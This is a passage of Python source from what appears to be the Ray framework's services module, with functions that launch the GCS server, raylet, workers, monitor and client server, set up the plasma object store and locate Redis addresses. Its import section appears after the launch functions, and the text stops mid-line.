fate_share=None, gcs_server_port=None, metrics_agent_port=None, node_ip_address=None): """Start a gcs server. Args: redis_address (str): The address that the Redis server is listening on. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. redis_password (str): The password of the redis server. config (dict|None): Optional configuration that will override defaults in RayConfig. gcs_server_port (int): Port number of the gcs server. metrics_agent_port(int): The port where metrics agent is bound to. node_ip_address(str): IP Address of a node where gcs server starts. Returns: ProcessInfo for the process that was started. 
""" gcs_ip_address, gcs_port = redis_address.split(":") redis_password = redis_password or "" config_str = serialize_config(config) if gcs_server_port is None: gcs_server_port = 0 command = [ GCS_SERVER_EXECUTABLE, f"--redis_address={gcs_ip_address}", f"--redis_port={gcs_port}", f"--config_list={config_str}", f"--gcs_server_port={gcs_server_port}", f"--metrics-agent-port={metrics_agent_port}", f"--node-ip-address={node_ip_address}", ] if redis_password: command += [f"--redis_password={redis_password}"] process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_GCS_SERVER, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) return process_info def start_raylet(redis_address, node_ip_address, node_manager_port, raylet_name, plasma_store_name, worker_path, setup_worker_path, worker_setup_hook, runtime_env_setup_hook, temp_dir, session_dir, resource_dir, log_dir, resource_spec, plasma_directory, object_store_memory, min_worker_port=None, max_worker_port=None, worker_port_list=None, object_manager_port=None, redis_password=None, metrics_agent_port=None, metrics_export_port=None, use_valgrind=False, use_profiler=False, stdout_file=None, stderr_file=None, config=None, huge_pages=False, fate_share=None, socket_to_use=None, start_initial_python_workers_for_first_job=False, max_bytes=0, backup_count=0): """Start a raylet, which is a combined local scheduler and object manager. Args: redis_address (str): The address of the primary Redis server. node_ip_address (str): The IP address of this node. node_manager_port(int): The port to use for the node manager. If it's 0, a random port will be used. raylet_name (str): The name of the raylet socket to create. plasma_store_name (str): The name of the plasma store socket to connect to. worker_path (str): The path of the Python file that new worker processes will execute. setup_worker_path (str): The path of the Python file that will run worker_setup_hook to set up the environment for the worker process. worker_setup_hook (str): The module path to a Python function that will be imported and run to set up the environment for the worker. runtime_env_setup_hook (str): The module path to a Python function that will be imported and run to set up the runtime env in agent. temp_dir (str): The path of the temporary directory Ray will use. session_dir (str): The path of this session. resource_dir(str): The path of resource of this session . log_dir (str): The path of the dir where log files are created. resource_spec (ResourceSpec): Resources for this raylet. object_manager_port: The port to use for the object manager. If this is None, then the object manager will choose its own port. min_worker_port (int): The lowest port number that workers will bind on. If not set, random ports will be chosen. max_worker_port (int): The highest port number that workers will bind on. If set, min_worker_port must also be set. redis_password: The password to use when connecting to Redis. metrics_agent_port(int): The port where metrics agent is bound to. metrics_export_port(int): The port at which metrics are exposed to. use_valgrind (bool): True if the raylet should be started inside of valgrind. If this is True, use_profiler must be False. use_profiler (bool): True if the raylet should be started inside a profiler. If this is True, use_valgrind must be False. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. 
If no redirection should happen, then this should be None. tracing_startup_hook: Tracing startup hook. config (dict|None): Optional Raylet configuration that will override defaults in RayConfig. max_bytes (int): Log rotation parameter. Corresponding to RotatingFileHandler's maxBytes. backup_count (int): Log rotation parameter. Corresponding to RotatingFileHandler's backupCount. Returns: ProcessInfo for the process that was started. """ assert node_manager_port is not None and type(node_manager_port) == int if use_valgrind and use_profiler: raise ValueError("Cannot use valgrind and profiler at the same time.") assert resource_spec.resolved() static_resources = resource_spec.to_resource_dict() # Limit the number of workers that can be started in parallel by the # raylet. However, make sure it is at least 1. num_cpus_static = static_resources.get("CPU", 0) maximum_startup_concurrency = max( 1, min(multiprocessing.cpu_count(), num_cpus_static)) # Format the resource argument in a form like 'CPU,1.0,GPU,0,Custom,3'. resource_argument = ",".join( ["{},{}".format(*kv) for kv in static_resources.items()]) gcs_ip_address, gcs_port = redis_address.split(":") has_java_command = False if shutil.which("java") is not None: has_java_command = True ray_java_installed = False try: jars_dir = get_ray_jars_dir() if os.path.exists(jars_dir): ray_java_installed = True except Exception: pass include_java = has_java_command and ray_java_installed if include_java is True: java_worker_command = build_java_worker_command( redis_address, plasma_store_name, raylet_name, redis_password, session_dir, node_ip_address, ) else: java_worker_command = [] if os.path.exists(DEFAULT_WORKER_EXECUTABLE): cpp_worker_command = build_cpp_worker_command( "", redis_address, plasma_store_name, raylet_name, redis_password, session_dir, log_dir, node_ip_address) else: cpp_worker_command = [] # Create the command that the Raylet will use to start workers. # TODO(architkulkarni): Pipe in setup worker args separately instead of # inserting them into start_worker_command and later erasing them if # needed. start_worker_command = [ sys.executable, setup_worker_path, f"--worker-setup-hook={worker_setup_hook}", f"--session-dir={session_dir}", worker_path, f"--node-ip-address={node_ip_address}", "--node-manager-port=RAY_NODE_MANAGER_PORT_PLACEHOLDER", f"--object-store-name={plasma_store_name}", f"--raylet-name={raylet_name}", f"--redis-address={redis_address}", f"--temp-dir={temp_dir}", f"--metrics-agent-port={metrics_agent_port}", f"--logging-rotate-bytes={max_bytes}", f"--logging-rotate-backup-count={backup_count}", "RAY_WORKER_DYNAMIC_OPTION_PLACEHOLDER", ] if redis_password: start_worker_command += [f"--redis-password={redis_password}"] # If the object manager port is None, then use 0 to cause the object # manager to choose its own port. 
    if object_manager_port is None:
        object_manager_port = 0

    if min_worker_port is None:
        min_worker_port = 0

    if max_worker_port is None:
        max_worker_port = 0

    # Create agent command
    agent_command = [
        sys.executable,
        "-u",
        os.path.join(RAY_PATH, "new_dashboard/agent.py"),
        f"--node-ip-address={node_ip_address}",
        f"--redis-address={redis_address}",
        f"--metrics-export-port={metrics_export_port}",
        f"--dashboard-agent-port={metrics_agent_port}",
        "--node-manager-port=RAY_NODE_MANAGER_PORT_PLACEHOLDER",
        f"--object-store-name={plasma_store_name}",
        f"--raylet-name={raylet_name}",
        f"--temp-dir={temp_dir}",
        f"--session-dir={session_dir}",
        f"--runtime-env-dir={resource_dir}",
        f"--runtime-env-setup-hook={runtime_env_setup_hook}",
        f"--log-dir={log_dir}",
        f"--logging-rotate-bytes={max_bytes}",
        f"--logging-rotate-backup-count={backup_count}",
    ]

    if redis_password is not None and len(redis_password) != 0:
        agent_command.append("--redis-password={}".format(redis_password))

    command = [
        RAYLET_EXECUTABLE,
        f"--raylet_socket_name={raylet_name}",
        f"--store_socket_name={plasma_store_name}",
        f"--object_manager_port={object_manager_port}",
        f"--min_worker_port={min_worker_port}",
        f"--max_worker_port={max_worker_port}",
        f"--node_manager_port={node_manager_port}",
        f"--node_ip_address={node_ip_address}",
        f"--redis_address={gcs_ip_address}",
        f"--redis_port={gcs_port}",
        f"--maximum_startup_concurrency={maximum_startup_concurrency}",
        f"--static_resource_list={resource_argument}",
        f"--python_worker_command={subprocess.list2cmdline(start_worker_command)}",  # noqa
        f"--java_worker_command={subprocess.list2cmdline(java_worker_command)}",  # noqa
        f"--cpp_worker_command={subprocess.list2cmdline(cpp_worker_command)}",  # noqa
        f"--redis_password={redis_password or ''}",
        f"--temp_dir={temp_dir}",
        f"--session_dir={session_dir}",
        f"--resource_dir={resource_dir}",
        f"--metrics-agent-port={metrics_agent_port}",
        f"--metrics_export_port={metrics_export_port}",
        f"--object_store_memory={object_store_memory}",
        f"--plasma_directory={plasma_directory}",
    ]
    if worker_port_list is not None:
        command.append(f"--worker_port_list={worker_port_list}")
    if start_initial_python_workers_for_first_job:
        command.append("--num_initial_python_workers_for_first_job={}".format(
            resource_spec.num_cpus))
    command.append("--agent_command={}".format(
        subprocess.list2cmdline(agent_command)))
    if huge_pages:
        command.append("--huge_pages")
    if socket_to_use:
        socket_to_use.close()
    process_info = start_ray_process(
        command,
        ray_constants.PROCESS_TYPE_RAYLET,
        use_valgrind=use_valgrind,
        use_gdb=False,
        use_valgrind_profiler=use_profiler,
        use_perftools_profiler=("RAYLET_PERFTOOLS_PATH" in os.environ),
        stdout_file=stdout_file,
        stderr_file=stderr_file,
        fate_share=fate_share)

    return process_info


def get_ray_jars_dir():
    """Return a directory where all ray-related jars and their dependencies
    are located."""
    current_dir = RAY_PATH
    jars_dir = os.path.abspath(os.path.join(current_dir, "jars"))
    if not os.path.exists(jars_dir):
        raise RuntimeError("Ray jars is not packaged into ray. "
                           "Please build ray with java enabled "
                           "(set env var RAY_INSTALL_JAVA=1)")
    return os.path.abspath(os.path.join(current_dir, "jars"))


def build_java_worker_command(
        redis_address,
        plasma_store_name,
        raylet_name,
        redis_password,
        session_dir,
        node_ip_address,
):
    """This method assembles the command used to start a Java worker.

    Args:
        redis_address (str): Redis address of GCS.
        plasma_store_name (str): The name of the plasma store socket to connect
            to.
        raylet_name (str): The name of the raylet socket to create.
redis_password (str): The password of connect to redis. session_dir (str): The path of this session. node_ip_address (str): The ip address for this node. Returns: The command string for starting Java worker. """ pairs = [] if redis_address is not None: pairs.append(("ray.address", redis_address)) pairs.append(("ray.raylet.node-manager-port", "RAY_NODE_MANAGER_PORT_PLACEHOLDER")) if plasma_store_name is not None: pairs.append(("ray.object-store.socket-name", plasma_store_name)) if raylet_name is not None: pairs.append(("ray.raylet.socket-name", raylet_name)) if redis_password is not None: pairs.append(("ray.redis.password", redis_password)) if node_ip_address is not None: pairs.append(("ray.node-ip", node_ip_address)) pairs.append(("ray.home", RAY_HOME)) pairs.append(("ray.logging.dir", os.path.join(session_dir, "logs"))) pairs.append(("ray.session-dir", session_dir)) command = ["java"] + ["-D{}={}".format(*pair) for pair in pairs] # Add ray jars path to java classpath ray_jars = os.path.join(get_ray_jars_dir(), "*") command += ["-cp", ray_jars] command += ["RAY_WORKER_DYNAMIC_OPTION_PLACEHOLDER"] command += ["io.ray.runtime.runner.worker.DefaultWorker"] return command def build_cpp_worker_command(cpp_worker_options, redis_address, plasma_store_name, raylet_name, redis_password, session_dir, log_dir, node_ip_address): """This method assembles the command used to start a CPP worker. Args: cpp_worker_options (list): The command options for CPP worker. redis_address (str): Redis address of GCS. plasma_store_name (str): The name of the plasma store socket to connect to. raylet_name (str): The name of the raylet socket to create. redis_password (str): The password of connect to redis. session_dir (str): The path of this session. log_dir (str): The path of logs. node_ip_address (str): The ip address for this node. Returns: The command string for starting CPP worker. """ command = [ DEFAULT_WORKER_EXECUTABLE, f"--ray-plasma-store-socket-name={plasma_store_name}", f"--ray-raylet-socket-name={raylet_name}", "--ray-node-manager-port=RAY_NODE_MANAGER_PORT_PLACEHOLDER", f"--ray-address={redis_address}", f"--ray-redis-password={redis_password}", f"--ray-session-dir={session_dir}", f"--ray-logs-dir={log_dir}", f"--ray-node-ip-address={node_ip_address}", "RAY_WORKER_DYNAMIC_OPTION_PLACEHOLDER", ] return command def determine_plasma_store_config(object_store_memory, plasma_directory=None, huge_pages=False): """Figure out how to configure the plasma object store. This will determine which directory to use for the plasma store. On Linux, we will try to use /dev/shm unless the shared memory file system is too small, in which case we will fall back to /tmp. If any of the object store memory or plasma directory parameters are specified by the user, then those values will be preserved. Args: object_store_memory (int): The object store memory to use. plasma_directory (str): The user-specified plasma directory parameter. huge_pages (bool): The user-specified huge pages parameter. Returns: The plasma directory to use. If it is specified by the user, then that value will be preserved. """ if not isinstance(object_store_memory, int): object_store_memory = int(object_store_memory) if huge_pages and not (sys.platform == "linux" or sys.platform == "linux2"): raise ValueError("The huge_pages argument is only supported on " "Linux.") system_memory = ray._private.utils.get_system_memory() # Determine which directory to use. 
By default, use /tmp on MacOS and # /dev/shm on Linux, unless the shared-memory file system is too small, # in which case we default to /tmp on Linux. if plasma_directory is None: if sys.platform == "linux" or sys.platform == "linux2": shm_avail = ray._private.utils.get_shared_memory_bytes() # Compare the requested memory size to the memory available in # /dev/shm. if shm_avail > object_store_memory: plasma_directory = "/dev/shm" elif (not os.environ.get("RAY_OBJECT_STORE_ALLOW_SLOW_STORAGE") and object_store_memory > ray_constants.REQUIRE_SHM_SIZE_THRESHOLD): raise ValueError( "The configured object store size ({} GB) exceeds " "/dev/shm size ({} GB). This will harm performance. " "Consider deleting files in /dev/shm or increasing its " "size with " "--shm-size in Docker. To ignore this warning, " "set RAY_OBJECT_STORE_ALLOW_SLOW_STORAGE=1.".format( object_store_memory / 1e9, shm_avail / 1e9)) else: plasma_directory = ray._private.utils.get_user_temp_dir() logger.warning( "WARNING: The object store is using {} instead of " "/dev/shm because /dev/shm has only {} bytes available. " "This will harm performance! You may be able to free up " "space by deleting files in /dev/shm. If you are inside a " "Docker container, you can increase /dev/shm size by " "passing '--shm-size={:.2f}gb' to 'docker run' (or add it " "to the run_options list in a Ray cluster config). Make " "sure to set this to more than 30% of available RAM.". format(ray._private.utils.get_user_temp_dir(), shm_avail, object_store_memory * (1.1) / (2**30))) else: plasma_directory = ray._private.utils.get_user_temp_dir() # Do some sanity checks. if object_store_memory > system_memory: raise ValueError( "The requested object store memory size is greater " "than the total available memory.") else: plasma_directory = os.path.abspath(plasma_directory) logger.info("object_store_memory is not verified when " "plasma_directory is set.") if not os.path.isdir(plasma_directory): raise ValueError(f"The file {plasma_directory} does not " "exist or is not a directory.") if huge_pages and plasma_directory is None: raise ValueError("If huge_pages is True, then the " "plasma_directory argument must be provided.") if object_store_memory < ray_constants.OBJECT_STORE_MINIMUM_MEMORY_BYTES: raise ValueError("Attempting to cap object store memory usage at {} " "bytes, but the minimum allowed is {} bytes.".format( object_store_memory, ray_constants.OBJECT_STORE_MINIMUM_MEMORY_BYTES)) # Print the object store memory using two decimal places. logger.debug( "Determine to start the Plasma object store with {} GB memory " "using {}.".format( round(object_store_memory / 10**9, 2), plasma_directory)) return plasma_directory, object_store_memory def start_worker(node_ip_address, object_store_name, raylet_name, redis_address, worker_path, temp_dir, raylet_ip_address=None, stdout_file=None, stderr_file=None, fate_share=None): """This method starts a worker process. Args: node_ip_address (str): The IP address of the node that this worker is running on. object_store_name (str): The socket name of the object store. raylet_name (str): The socket name of the raylet server. redis_address (str): The address that the Redis server is listening on. worker_path (str): The path of the source code which the worker process will run. temp_dir (str): The path of the temp dir. raylet_ip_address (str): The IP address of the worker's raylet. If not provided, it defaults to the node_ip_address. stdout_file: A file handle opened for writing to redirect stdout to. 
If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. Returns: ProcessInfo for the process that was started. """ command = [ sys.executable, "-u", worker_path, "--node-ip-address=" + node_ip_address, "--object-store-name=" + object_store_name, "--raylet-name=" + raylet_name, "--redis-address=" + str(redis_address), "--temp-dir=" + temp_dir, ] if raylet_ip_address is not None: command.append("--raylet-ip-address=" + raylet_ip_address) process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_WORKER, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) return process_info def start_monitor(redis_address, logs_dir, stdout_file=None, stderr_file=None, autoscaling_config=None, redis_password=None, fate_share=None, max_bytes=0, backup_count=0, monitor_ip=None): """Run a process to monitor the other processes. Args: redis_address (str): The address that the Redis server is listening on. logs_dir(str): The path to the log directory. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. autoscaling_config: path to autoscaling config file. redis_password (str): The password of the redis server. max_bytes (int): Log rotation parameter. Corresponding to RotatingFileHandler's maxBytes. backup_count (int): Log rotation parameter. Corresponding to RotatingFileHandler's backupCount. monitor_ip (str): IP address of the machine that the monitor will be run on. Can be excluded, but required for autoscaler metrics. Returns: ProcessInfo for the process that was started. """ monitor_path = os.path.join(RAY_PATH, AUTOSCALER_PRIVATE_DIR, "monitor.py") command = [ sys.executable, "-u", monitor_path, f"--logs-dir={logs_dir}", f"--redis-address={redis_address}", f"--logging-rotate-bytes={max_bytes}", f"--logging-rotate-backup-count={backup_count}" ] if autoscaling_config: command.append("--autoscaling-config=" + str(autoscaling_config)) if redis_password: command.append("--redis-password=" + redis_password) if monitor_ip: command.append("--monitor-ip=" + monitor_ip) process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_MONITOR, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) return process_info def start_ray_client_server(redis_address, ray_client_server_port, stdout_file=None, stderr_file=None, redis_password=None, fate_share=None, server_type: str = "proxy", serialized_runtime_env: Optional[str] = None, session_dir: Optional[str] = None): """Run the server process of the Ray client. Args: ray_client_server_port (int): Port the Ray client server listens on. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. redis_password (str): The password of the redis server. server_type (str): Whether to start the proxy version of Ray Client. serialized_runtime_env (str|None): If specified, the serialized runtime_env to start the client server in. Returns: ProcessInfo for the process that was started. 
""" root_ray_dir = Path(__file__).resolve().parents[1] setup_worker_path = os.path.join(root_ray_dir, "workers", ray_constants.SETUP_WORKER_FILENAME) conda_shim_flag = ( "--worker-setup-hook=" + ray_constants.DEFAULT_WORKER_SETUP_HOOK) command = [ sys.executable, setup_worker_path, conda_shim_flag, # These two args are to use the shim process. "-m", "ray.util.client.server", "--redis-address=" + str(redis_address), "--port=" + str(ray_client_server_port), "--mode=" + server_type ] if redis_password: command.append("--redis-password=" + redis_password) if serialized_runtime_env: command.append("--serialized-runtime-env=" + serialized_runtime_env) if session_dir: command.append(f"--session-dir={session_dir}") process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_RAY_CLIENT_SERVER, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) return process_info
import base64 import collections import errno import io import json import logging import multiprocessing import os from pathlib import Path import mmap import random import shutil import signal import socket import subprocess import sys import time from typing import Optional # Ray modules import ray import ray.ray_constants as ray_constants import redis # Import psutil and colorama after ray so the packaged version is used. import colorama import psutil resource = None if sys.platform != "win32": import resource EXE_SUFFIX = ".exe" if sys.platform == "win32" else "" # True if processes are run in the valgrind profiler. RUN_RAYLET_PROFILER = False # Location of the redis server and module. RAY_HOME = os.path.join(os.path.dirname(os.path.dirname(__file__)), "../..") RAY_PATH = os.path.abspath(os.path.dirname(os.path.dirname(__file__))) RAY_PRIVATE_DIR = "_private" AUTOSCALER_PRIVATE_DIR = "autoscaler/_private" REDIS_EXECUTABLE = os.path.join( RAY_PATH, "core/src/ray/thirdparty/redis/src/redis-server" + EXE_SUFFIX) REDIS_MODULE = os.path.join( RAY_PATH, "core/src/ray/gcs/redis_module/libray_redis_module.so") # Location of the raylet executables. RAYLET_EXECUTABLE = os.path.join(RAY_PATH, "core/src/ray/raylet/raylet" + EXE_SUFFIX) GCS_SERVER_EXECUTABLE = os.path.join( RAY_PATH, "core/src/ray/gcs/gcs_server" + EXE_SUFFIX) # Location of the cpp default worker executables. DEFAULT_WORKER_EXECUTABLE = os.path.join( RAY_PATH, "core/src/ray/cpp/default_worker" + EXE_SUFFIX) # Logger for this module. It should be configured at the entry point # into the program using Ray. Ray provides a default configuration at # entry/init points. logger = logging.getLogger(__name__) ProcessInfo = collections.namedtuple("ProcessInfo", [ "process", "stdout_file", "stderr_file", "use_valgrind", "use_gdb", "use_valgrind_profiler", "use_perftools_profiler", "use_tmux", ]) def serialize_config(config): return base64.b64encode(json.dumps(config).encode("utf-8")).decode("utf-8") class ConsolePopen(subprocess.Popen): if sys.platform == "win32": def terminate(self): if isinstance(self.stdin, io.IOBase): self.stdin.close() if self._use_signals: self.send_signal(signal.CTRL_BREAK_EVENT) else: super(ConsolePopen, self).terminate() def __init__(self, *args, **kwargs): # CREATE_NEW_PROCESS_GROUP is used to send Ctrl+C on Windows: # https://docs.python.org/3/library/subprocess.html#subprocess.Popen.send_signal new_pgroup = subprocess.CREATE_NEW_PROCESS_GROUP flags_to_add = 0 if ray._private.utils.detect_fate_sharing_support(): # If we don't have kernel-mode fate-sharing, then don't do this # because our children need to be in out process group for # the process reaper to properly terminate them. flags_to_add = new_pgroup flags_key = "creationflags" if flags_to_add: kwargs[flags_key] = (kwargs.get(flags_key) or 0) | flags_to_add self._use_signals = (kwargs[flags_key] & new_pgroup) super(ConsolePopen, self).__init__(*args, **kwargs) def address(ip_address, port): return ip_address + ":" + str(port) def new_port(lower_bound=10000, upper_bound=65535, denylist=None): if not denylist: denylist = set() port = random.randint(lower_bound, upper_bound) retry = 0 while port in denylist: if retry > 100: break port = random.randint(lower_bound, upper_bound) retry += 1 if retry > 100: raise ValueError("Failed to find a new port from the range " f"{lower_bound}-{upper_bound}. Denylist: {denylist}") return port def find_redis_address(address=None): """ Attempts to find all valid Ray redis addresses on this node. 
Returns: Set of detected Redis instances. """ # Currently, this extracts the deprecated --redis-address from the command # that launched the raylet running on this node, if any. Anyone looking to # edit this function should be warned that these commands look like, for # example: # /usr/local/lib/python3.8/dist-packages/ray/core/src/ray/raylet/raylet # --redis_address=123.456.78.910 --node_ip_address=123.456.78.910 # --raylet_socket_name=... --store_socket_name=... --object_manager_port=0 # --min_worker_port=10000 --max_worker_port=10999 # --node_manager_port=58578 --redis_port=6379 # --maximum_startup_concurrency=8 # --static_resource_list=node:123.456.78.910,1.0,object_store_memory,66 # --config_list=plasma_store_as_thread,True # --python_worker_command=/usr/bin/python # /usr/local/lib/python3.8/dist-packages/ray/workers/default_worker.py # --redis-address=123.456.78.910:6379 # --node-ip-address=123.456.78.910 --node-manager-port=58578 # --object-store-name=... --raylet-name=... # --temp-dir=/tmp/ray # --metrics-agent-port=41856 --redis-password=[MASKED] # --java_worker_command= --cpp_worker_command= # --redis_password=[MASKED] --temp_dir=/tmp/ray --session_dir=... # --metrics-agent-port=41856 --metrics_export_port=64229 # --agent_command=/usr/bin/python # -u /usr/local/lib/python3.8/dist-packages/ray/new_dashboard/agent.py # --redis-address=123.456.78.910:6379 --metrics-export-port=64229 # --dashboard-agent-port=41856 --node-manager-port=58578 # --object-store-name=... --raylet-name=... --temp-dir=/tmp/ray # --log-dir=/tmp/ray/session_2020-11-08_14-29-07_199128_278000/logs # --redis-password=[MASKED] --object_store_memory=5037192806 # --plasma_directory=/tmp # Longer arguments are elided with ... but all arguments from this instance # are included, to provide a sense of what is in these. # Indeed, we had to pull --redis-address to the front of each call to make # this readable. # As you can see, this is very long and complex, which is why we can't # simply extract all the the arguments using regular expressions and # present a dict as if we never lost track of these arguments, for # example. Picking out --redis-address below looks like it might grab the # wrong thing, but double-checking that we're finding the correct process # by checking that the contents look like we expect would probably be prone # to choking in unexpected ways. # Notice that --redis-address appears twice. This is not a copy-paste # error; this is the reason why the for loop below attempts to pick out # every appearance of --redis-address. # The --redis-address here is what is now called the --address, but it # appears in the default_worker.py and agent.py calls as --redis-address. pids = psutil.pids() redis_addresses = set() for pid in pids: try: proc = psutil.Process(pid) # HACK: Workaround for UNIX idiosyncrasy # Normally, cmdline() is supposed to return the argument list. # But it in some cases (such as when setproctitle is called), # an arbitrary string resembling a command-line is stored in # the first argument. # Explanation: https://unix.stackexchange.com/a/432681 # More info: https://github.com/giampaolo/psutil/issues/1179 cmdline = proc.cmdline() # NOTE(kfstorm): To support Windows, we can't use # `os.path.basename(cmdline[0]) == "raylet"` here. if len(cmdline) > 0 and "raylet" in os.path.basename(cmdline[0]): for arglist in cmdline: # Given we're merely seeking --redis-address, we just split # every argument on spaces for now. 
for arg in arglist.split(" "): # TODO(ekl): Find a robust solution for locating Redis. if arg.startswith("--redis-address="): proc_addr = arg.split("=")[1] if address is not None and address != proc_addr: continue redis_addresses.add(proc_addr) except psutil.AccessDenied: pass except psutil.NoSuchProcess: pass return redis_addresses def get_ray_address_to_use_or_die(): """ Attempts to find an address for an existing Ray cluster if it is not already specified as an environment variable. Returns: A string to pass into `ray.init(address=...)` """ return os.environ.get(ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE, find_redis_address_or_die()) def find_redis_address_or_die(): redis_addresses = find_redis_address() if len(redis_addresses) > 1: raise ConnectionError( f"Found multiple active Ray instances: {redis_addresses}. " "Please specify the one to connect to by setting `address`.") sys.exit(1) elif not redis_addresses: raise ConnectionError( "Could not find any running Ray instance. " "Please specify the one to connect to by setting `address`.") return redis_addresses.pop() def wait_for_node(redis_address, node_plasma_store_socket_name, redis_password=None, timeout=30): """Wait until this node has appeared in the client table. Args: redis_address (str): The redis address. node_plasma_store_socket_name (str): The plasma_store_socket_name for the given node which we wait for. redis_password (str): the redis password. timeout: The amount of time in seconds to wait before raising an exception. Raises: TimeoutError: An exception is raised if the timeout expires before the node appears in the client table. """ redis_ip_address, redis_port = redis_address.split(":") wait_for_redis_to_start(redis_ip_address, redis_port, redis_password) global_state = ray.state.GlobalState() global_state._initialize_global_state(redis_address, redis_password) start_time = time.time() while time.time() - start_time < timeout: clients = global_state.node_table() object_store_socket_names = [ client["ObjectStoreSocketName"] for client in clients ] if node_plasma_store_socket_name in object_store_socket_names: return else: time.sleep(0.1) raise TimeoutError("Timed out while waiting for node to startup.") def get_node_to_connect_for_driver(redis_address, node_ip_address, redis_password=None): redis_ip_address, redis_port = redis_address.split(":") # Get node table from global state accessor. global_state = ray.state.GlobalState() global_state._initialize_global_state(redis_address, redis_password) return global_state.get_node_to_connect_for_driver(node_ip_address) def get_webui_url_from_redis(redis_client): webui_url = redis_client.hmget("webui", "url")[0] return ray._private.utils.decode( webui_url) if webui_url is not None else None def remaining_processes_alive(): """See if the remaining processes are alive or not. Note that this ignores processes that have been explicitly killed, e.g., via a command like node.kill_raylet(). Returns: True if the remaining processes started by ray.init() are alive and False otherwise. Raises: Exception: An exception is raised if the processes were not started by ray.init(). """ if ray.worker._global_node is None: raise RuntimeError("This process is not in a position to determine " "whether all processes are alive or not.") return ray.worker._global_node.remaining_processes_alive() def validate_redis_address(address): """Validates address parameter. Returns: redis_address: string containing the full <host:port> address. redis_ip: string representing the host portion of the address. 
redis_port: integer representing the port portion of the address. """ if address == "auto": address = find_redis_address_or_die() redis_address = address_to_ip(address) redis_address_parts = redis_address.split(":") if len(redis_address_parts) != 2: raise ValueError("Malformed address. Expected '<host>:<port>'.") redis_ip = redis_address_parts[0] try: redis_port = int(redis_address_parts[1]) except ValueError: raise ValueError("Malformed address port. Must be an integer.") if redis_port < 1024 or redis_port > 65535: raise ValueError("Invalid address port. Must " "be between 1024 and 65535.") return redis_address, redis_ip, redis_port def address_to_ip(address): """Convert a hostname to a numerical IP addresses in an address. This should be a no-op if address already contains an actual numerical IP address. Args: address: This can be either a string containing a hostname (or an IP address) and a port or it can be just an IP address. Returns: The same address but with the hostname replaced by a numerical IP address. """ address_parts = address.split(":") ip_address = socket.gethostbyname(address_parts[0]) # Make sure localhost isn't resolved to the loopback ip if ip_address == "127.0.0.1": ip_address = get_node_ip_address() return ":".join([ip_address] + address_parts[1:]) def node_ip_address_from_perspective(address): """IP address by which the local node can be reached *from* the `address`. Args: address (str): The IP address and port of any known live service on the network you care about. Returns: The IP address by which the local node can be reached from the address. """ ip_address, port = address.split(":") s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: # This command will raise an exception if there is no internet # connection. s.connect((ip_address, int(port))) node_ip_address = s.getsockname()[0] except OSError as e: node_ip_address = "127.0.0.1" # [Errno 101] Network is unreachable if e.errno == errno.ENETUNREACH: try: # try get node ip address from host name host_name = socket.getfqdn(socket.gethostname()) node_ip_address = socket.gethostbyname(host_name) except Exception: pass finally: s.close() return node_ip_address def get_node_ip_address(address="8.8.8.8:53"): if ray.worker._global_node is not None: return ray.worker._global_node.node_ip_address return node_ip_address_from_perspective(address) def create_redis_client(redis_address, password=None): """Create a Redis client. Args: The IP address, port, and password of the Redis server. Returns: A Redis client. """ redis_ip_address, redis_port = redis_address.split(":") # For this command to work, some other client (on the same machine # as Redis) must have run "CONFIG SET protected-mode no". return redis.StrictRedis( host=redis_ip_address, port=int(redis_port), password=password) def start_ray_process(command, process_type, fate_share, env_updates=None, cwd=None, use_valgrind=False, use_gdb=False, use_valgrind_profiler=False, use_perftools_profiler=False, use_tmux=False, stdout_file=None, stderr_file=None, pipe_stdin=False): """Start one of the Ray processes. TODO(rkn): We need to figure out how these commands interact. For example, it may only make sense to start a process in gdb if we also start it in tmux. Similarly, certain combinations probably don't make sense, like simultaneously running the process in valgrind and the profiler. Args: command (List[str]): The command to use to start the Ray process. process_type (str): The type of the process that is being started (e.g., "raylet"). 
fate_share: If true, the child will be killed if its parent (us) dies. True must only be passed after detection of this functionality. env_updates (dict): A dictionary of additional environment variables to run the command with (in addition to the caller's environment variables). cwd (str): The directory to run the process in. use_valgrind (bool): True if we should start the process in valgrind. use_gdb (bool): True if we should start the process in gdb. use_valgrind_profiler (bool): True if we should start the process in the valgrind profiler. use_perftools_profiler (bool): True if we should profile the process using perftools. use_tmux (bool): True if we should start the process in tmux. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. pipe_stdin: If true, subprocess.PIPE will be passed to the process as stdin. Returns: Information about the process that was started including a handle to the process that was started. """ # Detect which flags are set through environment variables. valgrind_env_var = f"RAY_{process_type.upper()}_VALGRIND" if os.environ.get(valgrind_env_var) == "1": logger.info("Detected environment variable '%s'.", valgrind_env_var) use_valgrind = True valgrind_profiler_env_var = f"RAY_{process_type.upper()}_VALGRIND_PROFILER" if os.environ.get(valgrind_profiler_env_var) == "1": logger.info("Detected environment variable '%s'.", valgrind_profiler_env_var) use_valgrind_profiler = True perftools_profiler_env_var = (f"RAY_{process_type.upper()}" "_PERFTOOLS_PROFILER") if os.environ.get(perftools_profiler_env_var) == "1": logger.info("Detected environment variable '%s'.", perftools_profiler_env_var) use_perftools_profiler = True tmux_env_var = f"RAY_{process_type.upper()}_TMUX" if os.environ.get(tmux_env_var) == "1": logger.info("Detected environment variable '%s'.", tmux_env_var) use_tmux = True gdb_env_var = f"RAY_{process_type.upper()}_GDB" if 